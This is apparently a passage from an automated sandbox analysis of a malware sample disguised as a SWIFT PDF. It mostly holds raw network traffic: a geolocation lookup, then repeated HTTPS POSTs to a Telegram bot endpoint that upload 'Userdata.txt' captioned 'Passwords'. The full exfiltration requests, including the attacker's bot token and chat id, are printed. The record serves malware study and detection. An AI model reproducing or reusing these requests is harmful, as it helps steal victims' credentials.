                                                                                                                              2024-12-16 08:05:38 UTC4833INData Raw: 18 fd ef 94 1a d0 85 3e 81 0d d3 5e 22 da 27 4e 42 5b 93 f4 fd da 2a 71 60 dc 4f 14 06 47 38 4c e0 57 41 2e 78 61 ea e6 a5 26 f9 4b 9a 34 0c 45 42 b9 ec c0 37 a4 77 b6 df 5a 27 15 ce ae 30 80 1a 53 1b d8 8c 3b 6f e6 52 da 2c 63 56 3a 05 ef ca 3f 46 5a 66 2d e1 24 99 de e0 57 5f 09 d0 fd cd 77 5b de 29 a5 ee b1 cc df cc cc 5e e0 05 ba 00 03 7f 4c 3b 4b 8f 77 b7 64 c5 02 30 f1 87 13 92 7a 4a ef ef 4d 17 2d 18 73 12 b4 b8 78 cf 01 9d 5c 01 83 e2 02 6d a9 8a 93 15 37 c9 d6 31 b2 c3 e3 86 9c 64 95 ed 89 f9 52 7d 1b 29 66 cf 42 ce d6 71 f1 58 34 7f d5 7d 17 aa 25 05 12 79 09 a1 a2 91 44 f6 ca fd 82 da 84 1b 06 a7 ab 6b 5d a3 78 d4 97 aa 96 79 bc 55 89 89 92 00 d5 f6 0b 7e 8f 1f 5c 98 a4 16 ae 60 bb 6c ac 11 e5 ab 72 d3 32 a9 da c8 2a ca fc 98 6b a5 b8 76 6c ae
                                                                                                                              Data Ascii: >^"'NB[*q`OG8LWA.xa&K4EB7wZ'0S;oR,cV:?FZf-$W_w[)^L;Kwd0zJM-sx\m71dR})fBqX4}%yDk]xyU~\`lr2*kvl
                                                                                                                              2024-12-16 08:05:38 UTC1323INData Raw: c9 82 84 15 05 a9 8c 21 44 29 61 55 59 67 66 a2 85 12 03 a6 15 e1 d4 b1 8a 5a 52 75 b0 21 31 32 3c c6 4a 33 f5 a7 49 28 3b 2c 0d 44 f3 db 6d be 84 dc 58 a8 b2 8d 2d 38 1b cb 40 54 a8 8f 41 51 9a 9e 34 3e ac 8f ac cf 23 34 ef 95 c6 f7 19 da 4b 53 97 84 4d 17 4f 84 4b 92 be 31 d8 c8 73 54 dc 9b 15 76 99 61 56 18 95 0b 34 fd 55 0f 3e 21 7d 5a f5 4f dc 00 71 21 78 b4 6b e0 d4 4a 8f 85 43 5f 2d 4f 33 7a fa 05 58 f5 ce 2a 6e ae e4 3a 9f b0 00 62 bb 74 73 a6 37 3e 72 c8 88 fb d9 ad 59 7c 28 65 1a c2 3f bd bb 7b f9 2f a7 4b d1 6e 08 0d e6 31 c6 40 33 36 f4 2e 47 a2 df 91 14 18 cc ba 87 24 9e a4 bd 50 9c 1d e5 c6 4b 91 53 fa 88 9f d8 25 5f 9d 79 2a c2 42 bf 23 3d 0a c8 72 93 06 60 7b 4e 90 2b 9f 90 3b c1 42 fd f9 ba 4c 35 d5 ca b9 01 30 12 1e 9a f8 d5 c7 bf 45 dd
                                                                                                                              Data Ascii: !D)aUYgfZRu!12<J3I(;,DmX-8@TAQ4>#4KSMOK1sTvaV4U>!}ZOq!xkJC_-O3zX*n:bts7>rY|(e?{/Kn1@36.G$PKS%_y*B#=r`{N+;BL50E
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: 1d 60 c1 0a 96 cb 75 e4 61 91 51 fc 5d 2c 7e 6f fd 84 2a f1 2e 76 d5 29 10 11 83 43 75 85 96 bd c2 56 40 b6 a3 11 f5 1e f7 0d 5d 75 a0 96 92 cf 2a 4b 71 70 1f 66 5c b1 00 a1 52 fe e3 5f 33 a5 ed 90 85 97 e6 81 dd 20 e5 3c 8a 20 0a 6d 9c a3 ae 35 2f 04 e8 7f 62 47 47 ad 4f 88 82 f5 8a a3 0e 66 90 73 54 0b ba 59 4a e0 7a a7 3a 53 c7 1d 6c 6d 25 bf 70 85 0a 59 05 c9 e1 43 fc c8 d5 de d8 9c b0 06 39 64 bb 39 9f 09 35 15 47 bc c7 22 11 46 c8 6e 1f 74 eb 37 f0 92 21 83 c5 8d 12 6b b0 8d f2 ae 9b 25 7d 24 76 85 d7 0d d7 e4 bf 3b 13 fc 56 6a f2 25 1a 7b a2 48 34 69 df 75 fa d0 68 85 66 ee 71 8a b4 d8 04 f1 f1 0b e7 21 f6 a5 d7 4e 44 07 67 0d 66 c5 20 ce ae 46 e3 c1 ae f2 15 bb 85 19 68 ce 28 11 f3 dd 14 a7 cc a1 7f bd af 4a 40 7b a4 dc f1 06 09 67 44 e4 d8 76 08
                                                                                                                              Data Ascii: `uaQ],~o*.v)CuV@]u*Kqpf\R_3 < m5/bGGOfsTYJz:Slm%pYC9d95G"Fnt7!k%}$v;Vj%{H4iuhfq!NDgf Fh(J@{gDv
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: 3f ef c0 37 bf 7b 7b 0c d3 11 33 ec a0 43 64 09 57 11 e3 d1 2a 61 fd 81 bf 7e 79 56 4a 6a 04 b4 27 4c 4d b4 30 58 2f 99 a4 e5 6f cf 07 a2 a3 c1 89 2a e5 62 b4 eb 82 c4 cf dd dd 47 e0 79 ba 00 03 7f 58 3b 5f 9e 98 b7 64 cb c6 ae e2 96 0a ea 2e 5d 39 68 14 06 2b 76 ef 06 a2 a1 13 9c e3 98 58 1e 00 f4 13 75 b8 8f 83 2c b5 a6 24 3b c0 b9 ce 97 f8 5a 32 cd 59 ff 3d 40 e5 28 7f f0 14 d9 c5 62 8f d3 18 79 c9 6e 1e ac 7c 04 15 6e 6a c7 bf 80 57 e5 62 7c 93 cc e7 28 79 91 a9 61 32 21 6c c5 86 3b f7 4b 8d 42 9c ee 17 1b 44 e3 67 56 90 08 27 1c bf 87 bb 4c 42 02 2c ef e4 8a 73 bb 01 b5 cb d0 4a 40 ed 85 58 4f b1 08 77 bf 71 19 6d 75 87 82 0f 88 f9 b3 03 72 6a b0 68 0d 50 64 2d 6b 08 d5 ed d0 e1 23 a4 18 cb a6 8e c7 de 89 c8 4d ad 16 6e 0d cd 18 ca 7b 03 7f ac 50 e5
                                                                                                                              Data Ascii: ?7{{3CdW*a~yVJj'LM0X/o*bGyX;_d.]9h+vXu,$;Z2Y=@(byn|njWb|(ya2!l;KBDgV'LB,sJ@XOwqmurjhPd-k#Mn{P
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: fe 74 74 c9 37 55 ed 83 d5 55 e4 1f 48 0e 2f 79 b0 04 47 02 61 bd b8 99 db e0 2c ce e3 fb 0c b5 4b af 13 6b 20 6f 3b dd 30 a1 e0 40 9d bc 1f c6 5d 95 81 51 8b 3c 59 d2 18 22 f6 50 d9 81 08 ad 9e 87 4f f9 87 e6 98 9f c5 4e 4a 94 43 b6 44 9d 55 0f 1f 6d 68 2b 62 28 98 87 a6 16 ad 74 5f 00 8c 93 42 3a b2 69 8a e3 ec 58 f5 85 e1 78 98 da bf c5 2a 60 dd e5 60 d1 f5 4c 41 76 f1 cb b8 b2 30 9d 4f 4c 0b 16 fc 7b 0c 3a 0b e0 55 5d 89 4d df ee 77 f3 0e 19 18 b4 7d b5 81 38 4b f1 ce 91 57 83 10 05 b2 6c 84 f4 c7 e6 d6 74 f7 80 e0 cf d1 c4 d6 c2 6a 7d 74 42 04 0d d6 e0 6b 44 28 49 5d 5e 6d 68 f9 85 12 06 cb 6f aa d4 bb 8e ae 88 fb d9 30 eb 27 e3 5f f5 c3 e1 a7 49 2d 2a 29 7e 12 e2 dc 7f 9e db b5 43 78 e7 a7 2d 38 15 cb 40 6f af 9b 57 6a 4d 9c 34 ae bf 8b 72 cb 06 1c
                                                                                                                              Data Ascii: tt7UUH/yGa,Kk o;0@]Q<Y"PONJCDUmh+b(t_B:iXx*``LAv0OL{:U]Mw}8KWltj}tBkD(I]^mho0'_I-*)~Cx-8@oWjM4r
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: c8 51 58 af e4 3e 84 63 00 73 b1 6b 6f 8e ed 45 3a c2 fa df ba fe 29 54 6c 4d 4e c8 35 b7 b1 5b 12 29 b6 47 f6 64 33 30 af 31 c6 42 68 32 f4 2e 4b ae d7 e3 4c 7f 80 ca e8 f2 e0 f7 bb 76 9e 5a 62 c6 4b 9d 49 29 88 9e df 31 74 a8 6c 50 8e 42 b7 36 12 ab a0 6e 99 76 0f ae 64 90 2d 89 a8 20 c6 1a 82 e5 ba 19 5a 00 db b9 05 5d 2b 16 8b fb d9 65 a3 45 a9 17 6f de 75 92 d0 b1 59 f0 1a 7b 7e 6f fd 35 07 fa 54 1c 83 2f 48 b0 a7 58 76 85 54 bc c2 5a 8d 96 be 63 9f 23 63 7d ff 5b 13 9f 83 cc 2d b1 0e 6c 15 77 52 b6 fa 88 0f f5 f2 5e 9f bc c5 3a 81 97 fe 92 f0 92 ba 3c 80 39 1e 75 b1 1b 3f eb 26 05 ef 81 74 4b 6c 8d 54 cf 29 f5 8a a3 06 ab 97 2a ca 17 ba 03 24 25 7a a7 3e 3c 85 1d 16 f0 0d 0c 70 85 0c 4a 1b f9 fa 47 c4 29 d0 de 84 8a 98 96 39 17 68 2f 61 00 2f 0a b8
                                                                                                                              Data Ascii: QX>cskoE:)TlMN5[)Gd301Bh2.KLvZbKI)1tlPB6nvd- Z]+eEouY{~o5T/HXvTZc#c}[-lwR^:<9u?&tKlT)*$%z><pJG)9h/a/
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: 02 f2 d3 18 46 68 4e 13 c8 73 c4 50 ab 1e 42 e2 cb 06 b8 08 c4 5b 13 40 50 5a f5 e2 ce 6d d9 1a b5 81 b6 1e 65 48 0f 6c 22 f0 1f 70 e1 57 c8 be 31 7d 3d b3 ed 30 54 c1 a4 66 b3 a2 1a 6b c7 6b 39 18 fb f6 91 1a d7 ea 9c a1 0d f1 f9 2b d2 3b 4e dd 35 8e e2 e1 da 50 1e bc b3 39 12 69 12 38 32 f8 7f fd 2a 50 ec f9 e3 af 37 23 35 78 38 20 32 5d fe 6c c0 37 a4 61 94 02 58 07 4f 1f ab 30 fa 1f 7f 9a f0 de 31 79 12 8c 92 3d 6f 47 36 29 a2 a9 aa 79 5a 62 5e 92 39 eb 48 e2 7f ae ab f5 e0 d2 2b 7f d5 5e 98 fe 88 a7 7c e9 d5 4f 97 2b 9f 1a 7b 2a 5f 2a 3d 53 4c ac 75 c4 d3 98 ed f5 37 dd f4 3a 4d cd ed 06 2b 7d ef 1f ca bd 06 ee 05 8c 55 46 5d e2 02 6d 29 94 95 3d a2 c9 d6 2a c7 a4 3e 95 eb 5d a4 fc 8f c1 dd be e4 d6 6c e7 db de f3 53 ad ca 34 75 cc 73 06 84 05 01 15
                                                                                                                              Data Ascii: FhNsPB[@PZmeHl"pW1}=0Tfkk9+;N5P9i82*P7#5x8 2]l7aXO01y=oG6)yZb^9H+^|O+{*_*=SLu7:M+}UF]m)=*>]lS4us
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: ab 67 7a 65 4c 12 93 14 13 c7 89 00 2d 73 af 66 10 62 3b 2f ce f2 d5 ed db ec 7b d6 fe d5 b5 e8 17 19 9b c1 9f 9b 2e 0d 37 aa 9a a0 d9 56 09 4e 54 47 f9 42 a6 c5 e2 1f e7 6e 83 1e 5f a4 98 97 66 de 34 50 59 f5 c0 d1 ed 5a 2a 1c fc 59 9b f2 31 8b ee 39 91 9a 64 a4 1a 62 2a bc 74 cb e6 c2 3d bf 86 b9 3a 2d 16 78 13 2f 22 3d 83 33 b4 ff 5f 8d 36 6e 7a e1 02 7f ed 89 dd 6b e2 37 08 0f 2f 73 5f 04 47 39 20 a3 ca 51 c0 e0 5c e6 be fb 0c bf 17 b8 9e 32 4a 6e 3a d1 27 89 18 40 d9 b6 09 39 47 a8 8c 42 f2 2c 5c fe 22 36 e5 45 d9 a6 c9 85 46 87 4f 81 17 ce bb ef ab 15 fd 94 43 b6 49 b5 a9 27 e7 67 40 da 69 2f ab d2 a1 07 ab 1d d0 d7 8c 99 57 3e 91 58 c1 f7 83 56 9a 57 eb 50 a4 fc b7 a0 ea 69 cc ea 03 96 e6 4a 56 76 fc e2 a5 dc cd 9d 47 57 1f 6f 85 6c 1f 46 75 39 79
                                                                                                                              Data Ascii: gzeL-sfb;/{.7VNTGBn_f4PYZ*Y19db*t=:-x/"=3_6nzk7/s_G9 Q\2Jn:'@9GB,\"6EFOCI'g@i/W>XVWPiJVvGWolFu9y
                                                                                                                              2024-12-16 08:05:38 UTC1390INData Raw: 50 72 80 5f f1 37 31 30 39 48 23 4e ab a7 49 2c 6e 2f 76 09 99 da 69 96 45 dc 58 a2 8b c1 2d 39 04 fb 44 7e d4 8e 41 42 99 9c 34 b5 ac 90 b0 c3 fb 34 fe 9f b6 15 7a da 3b 7f a7 d7 4d 1d 4f ac 19 ba 46 3b d2 c4 6b 57 f4 d9 38 7b 9b 1c 63 cf 95 0f 1a 22 5d 7d 6e 3d 7d 2a 98 e6 96 00 77 03 0e 88 b8 e0 de 64 cc 5f 50 53 30 5b 27 47 fc 01 74 f8 c4 40 23 dc 8c 22 b7 13 6f b7 b1 74 75 ab 3d 54 3d ba f6 e3 a7 8e 36 a9 22 4d 48 d1 3b bf a6 74 98 b5 aa 4d 8d 0c df 76 ae 37 d5 41 0a e0 dc bd 4d a2 d9 82 1e 72 88 96 c4 26 c8 f4 bc 50 9c 5a b5 c7 4b 91 31 f6 9a 98 c3 0a e7 90 7b 57 9d 4b ae 2e 01 27 c9 61 93 17 6a 6d 9a 91 38 8f b1 3a ed 7e d4 53 ba 69 3f c4 de d6 5c 4e 2f 14 8b f5 83 6c bf 45 df 6b bf de 75 94 e8 94 48 dd 98 e8 7e 65 f3 37 08 99 c0 2c c0 59 0f 66 a6
                                                                                                                              Data Ascii: Pr_7109H#NI,n/viEX-9D~AB44z;MOF;kW8{c"]}n=}*wd_PS0['Gt@#"otu=T=6"MH;tMv7AMr&PZK1{WK.'ajm8:~Si?\N/lEkuH~e7,Yf


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.449832104.21.67.1524437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:05:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-16 08:05:43 UTC886INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:43 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 325112
                                                                                                                              Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OEYLptedoVFgU7CIbVV972L9EZJl1zcihG7vYV%2BCjyQKczP%2FbiXepE9B3BA%2FFtWz27%2BOIUoAjNs0dTy3BwTZhUg1%2Bsfj9Xa994QfLOdN9llmDHg%2B9udr%2BCGFI3NiWUk5wmQfM%2Fh6"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f2d2b83c8ac0fa1-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1459&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1876606&cwnd=252&unsent_bytes=0&cid=05c4e2a336de3ad4&ts=451&x=0"
                                                                                                                              2024-12-16 08:05:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449852149.154.167.2204437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:05:51 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1d7e8af6a03c
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-16 08:05:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 37 65 38 61 66 36 61 30 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1d7e8af6a03cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-16 08:05:51 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:51 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 542
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-16 08:05:51 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 36 33 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":12275,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734336351,"document":{"file_n


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449861149.154.167.2204437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:05:54 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1da853a7b98d
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-16 08:05:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 61 38 35 33 61 37 62 39 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1da853a7b98dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-16 08:05:55 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:55 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 545
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-16 08:05:55 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 36 33 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":12276,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734336355,"document":{"file_n


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.449872149.154.167.2204437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:05:58 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1dcf16c14216
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-16 08:05:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 63 66 31 36 63 31 34 32 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1dcf16c14216Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-16 08:05:59 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:58 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 542
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-16 08:05:59 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 36 33 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
